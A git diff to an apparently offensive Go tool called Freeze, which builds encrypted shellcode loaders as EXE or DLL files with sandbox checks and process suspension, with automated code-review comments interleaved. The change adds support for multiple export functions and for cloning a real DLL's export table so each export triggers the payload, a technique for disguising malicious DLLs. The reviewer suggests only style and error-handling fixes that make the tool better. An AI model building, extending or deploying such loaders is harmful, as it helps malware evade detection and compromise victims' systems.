diff --git a/Freeze.go b/Freeze.go
index 9fd4a79..1f5d40a 100644
--- a/Freeze.go
+++ b/Freeze.go
@@ -39,7 +39,7 @@ func options() *FlagOptions {
 Does the Endpoint have more than 2 CPUs?
 Does the Endpoint have more than 4 gigs of RAM?`)
 encrypt := flag.Bool("encrypt", false, "Encrypts the shellcode using AES 256 encryption")
- export := flag.String("export", "", "For DLL Loaders Only - Specify a specific Export function for a loader to have.")
+ export := flag.String("export", "", "For DLL Loaders Only - Specify comma separated Export functions for a loader to have or supply a given DLL file for cloning its Export functions.")
 flag.Parse()
 return &FlagOptions{outFile: *outFile, inputFile: *inputFile, console: *console, Sha: *Sha, sandbox: *sandbox, process: *process, export: *export, encrypt: *encrypt}
 }
@@ -134,11 +134,27 @@ func main() {
 } else {
 mode = ".exe"
 }
+ // Default DLL exports
+ var exports = []string{"DllRegisterServer", "DllGetClassObject", "DllUnregisterServer"}
 if opt.export != "" {
- fmt.Println("[!] Added an additional Export function called: " + opt.export)
+ if strings.HasSuffix(opt.export, ".dll") {
+ var err error
+ exports, err = Utils.ExportsFromFile(opt.export)
+ if err != nil {
+ log.Fatal("Error: Could not get Export table from given DLL file")
+ }
+ fmt.Println("[!] Added additional Export functions from parsed DLL file: " + opt.export)
+ } else if strings.Contains(opt.export, ",") {
+ exports = strings.Split(strings.ReplaceAll(opt.export, " ", ""), ",")
+ fmt.Println("[!] Added additional Export functions from given list: " + opt.export)
+ } else {
+ exports = []string{opt.export}
+ fmt.Println("[!] Added an additional Export function called: " + opt.export)
+ }
 }
+
 fmt.Println("[!] Selected Process to Suspend: " + opt.process)
- name := Loader.CompileFile(shellcodeencoded, b64ciphertext, b64key, b64iv, opt.outFile, opt.console, mode, opt.export, opt.sandbox, opt.process, opt.encrypt)
+ name := Loader.CompileFile(shellcodeencoded, b64ciphertext, b64key, b64iv, opt.outFile, opt.console, mode, exports, opt.sandbox, opt.process, opt.encrypt)
 execute(opt, name, mode)
 }
diff --git a/Loader/Loader.go b/Loader/Loader.go
index 1ac4dac..cbc38a6 100644
--- a/Loader/Loader.go
+++ b/Loader/Loader.go
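Review bot: The `log.Fatal` in the `.dll` branch discards the `err` returned by `Utils.ExportsFromFile`, so a missing file, a non-PE file and a file with no export table all die with the same generic message; `log.Fatalf("Error: Could not get Export table from %q: %v", opt.export, err)` keeps the cause. `strings.HasSuffix(opt.export, ".dll")` is case-sensitive, so a path ending in `.DLL` falls through to the single-name branch and is used verbatim as an export name; `strings.HasSuffix(strings.ToLower(opt.export), ".dll")` avoids that. The three messages say functions were "added", but each branch assigns `exports` and so replaces the default list rather than extending it; the wording (or the `-export` help text in the first hunk) should say which it is. `main` begins outside the hunk.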
@@ -35,18 +35,21 @@ var (
 buffer bytes.Buffer
 )
-func DLLfunction(export string) string {
+func DLLfunctions(exports []string) string {
 var buffer bytes.Buffer
 DLL := &DLL{}
 DLL.Variables = make(map[string]string)
- if export != "" {
- DLL.Variables["ExportFunction"] = `//export ` + export + `
- func ` + export + `() {
- Run()
- }`
- } else {
- DLL.Variables["ExportFunction"] = ``
+ var dllStrings string
+ for _, export := range exports {
+ if export != "" {
+ dllStrings = dllStrings + `//export ` + export + `
+ func ` + export + `() {
+ Run()
+ }
+ `
+ }
+ }
+ DLL.Variables["ExportFunction"] = dllStrings
 buffer.Reset()
 DLLExportTemplate, err := template.New("DLL").Parse(Struct.DLL_Export())
@@ -60,7 +63,7 @@ func DLLfunction(export string) string {
 }
-func MainFunction(shellcodeencoded string, mode string, console bool, exportable string, sandbox bool, process string, encrypt bool, b64ciphertext string, b64key string, b64iv string) string {
+func MainFunction(shellcodeencoded string, mode string, console bool, exportables string, sandbox bool, process string, encrypt bool, b64ciphertext string, b64key string, b64iv string) string {
 var buffer bytes.Buffer
 Main := &Main{}
 Main.Variables = make(map[string]string)
@@ -224,7 +227,7 @@ func MainFunction(shellcodeencoded string, mode string, console bool, exportable
 }
 if mode == "dll" {
- Main.Variables["StartingFunction"] = exportable
+ Main.Variables["StartingFunction"] = exportables
 Main.Variables["ImportC"] = `import "C"`
 } else {
 Main.Variables["StartingFunction"] = `func main(){`
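Review bot: `dllStrings` is rebuilt with `+` on every iteration of the new loop in `DLLfunctions`; a `strings.Builder` (or a second `bytes.Buffer`, since `bytes` is already imported) states the intent and avoids re-copying the accumulated text for each export. Inverting the empty-name check into a `continue` also keeps the body flat. The rest of `DLLfunctions` (template parse and execute) continues outside the hunk.
```go
	var dllStrings strings.Builder
	for _, export := range exports {
		if export == "" {
			continue
		}
		dllStrings.WriteString(`//export ` + export + `
func ` + export + `() {
	Run()
}
`)
	}
	DLL.Variables["ExportFunction"] = dllStrings.String()
	// … unchanged: template parse and execute …
```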
@@ -364,10 +367,10 @@ func MainFunction(shellcodeencoded string, mode string, console bool, exportable return buffer.String() } -func CompileFile(shellcodeencoded string, b64ciphertext string, b64key string, b64iv string, outFile string, console bool, mode string, export string, sandbox bool, process string, encrypt bool) string { +func CompileFile(shellcodeencoded string, b64ciphertext string, b64key string, b64iv string, outFile string, console bool, mode string, exports []string, sandbox bool, process string, encrypt bool) string { var exporttable string if mode == "dll" { - exporttable = DLLfunction(export) + exporttable = DLLfunctions(exports) } else { exporttable = "" } diff --git a/Struct/Struct.go b/Struct/Struct.go index a710f46..4ee4f84 100644 --- a/Struct/Struct.go +++ b/Struct/Struct.go @@ -2,28 +2,12 @@ package Struct func DLL_Export() string { return ` - //export DllRegisterServer - func DllRegisterServer() { - Run() - } - - //export DllGetClassObject - func DllGetClassObject() { - Run() - } - - //export DllUnregisterServer - func DllUnregisterServer() { - Run() - } - {{.Variables.ExportFunction}} func main(){ } - //export Run func Run(){ diff --git a/Utils/Utils.go b/Utils/Utils.go index 43f20f2..c0dc3ae 100644 --- a/Utils/Utils.go +++ b/Utils/Utils.go @@ -7,6 +7,7 @@ import ( "encoding/hex" "errors" "fmt" + "github.com/Binject/debug/pe" "io" "log" crand "math/rand" @@ -154,3 +155,20 @@ func CapLetter() string { } return string(b) } + +func ExportsFromFile(file string) (exports []string, err error) { + dllFile, err := pe.Open(file) + if err != nil { + return + } + exps, err := dllFile.Exports() + if err != nil { + return + } + for _, export := range exps { + if "Run" != export.Name { + exports = append(exports, export.Name) + } + } + return +} diff --git a/go.mod b/go.mod index 4f27109..7dfe8e7 100644 --- a/go.mod +++ b/go.mod 
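Review bot: The new `github.com/Binject/debug/pe` import in `Utils/Utils.go` is inserted into the standard-library group between `fmt` and `io`; `goimports` puts third-party modules in their own blank-line separated group after the stdlib block, so this line will be re-sorted the next time anyone formats the file. Moving it below the stdlib group now keeps that later diff quiet.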
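Review bot: `dllFile` returned by `pe.Open` is never closed in `ExportsFromFile`, so the file handle stays open for the rest of the process; this fork mirrors the standard `debug/pe`, where `*pe.File` has a `Close` method, so `defer dllFile.Close()` right after the first error check should be all that is needed (confirm against the package). Both error paths hand back the library error bare through the named results, which is why the caller can only print a generic message; wrapping as `return nil, fmt.Errorf("opening %q: %w", file, err)` and the same for `Exports()` keeps the cause and the path. Style: `"Run" != export.Name` reads more naturally as `export.Name != "Run"`, and dropping the named results in favour of an explicit `return exports, nil` removes the bare returns.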
@@ -1,3 +1,5 @@
 module Freeze
 go 1.19
+require golang.org/x/sys v0.0.0-20220926163933-8cfa568d3c25 // indirect
+require github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee
\ No newline at end of file
diff --git a/go.sum b/go.sum
index e69de29..9aa9e58 100644
--- a/go.sum
+++ b/go.sum
@@ -0,0 +1,4 @@
+golang.org/x/sys v0.0.0-20220926163933-8cfa568d3c25 h1:nwzwVf0l2Y/lkov/+IYgMMbFyI+QypZDds9RxlSmsFQ=
+golang.org/x/sys v0.0.0-20220926163933-8cfa568d3c25/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee h1:neBp9wDYVY4Uu1gGlrL+IL4JeZslz+hGEAjBXGAPWak=
+github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ=
\ No newline at end of file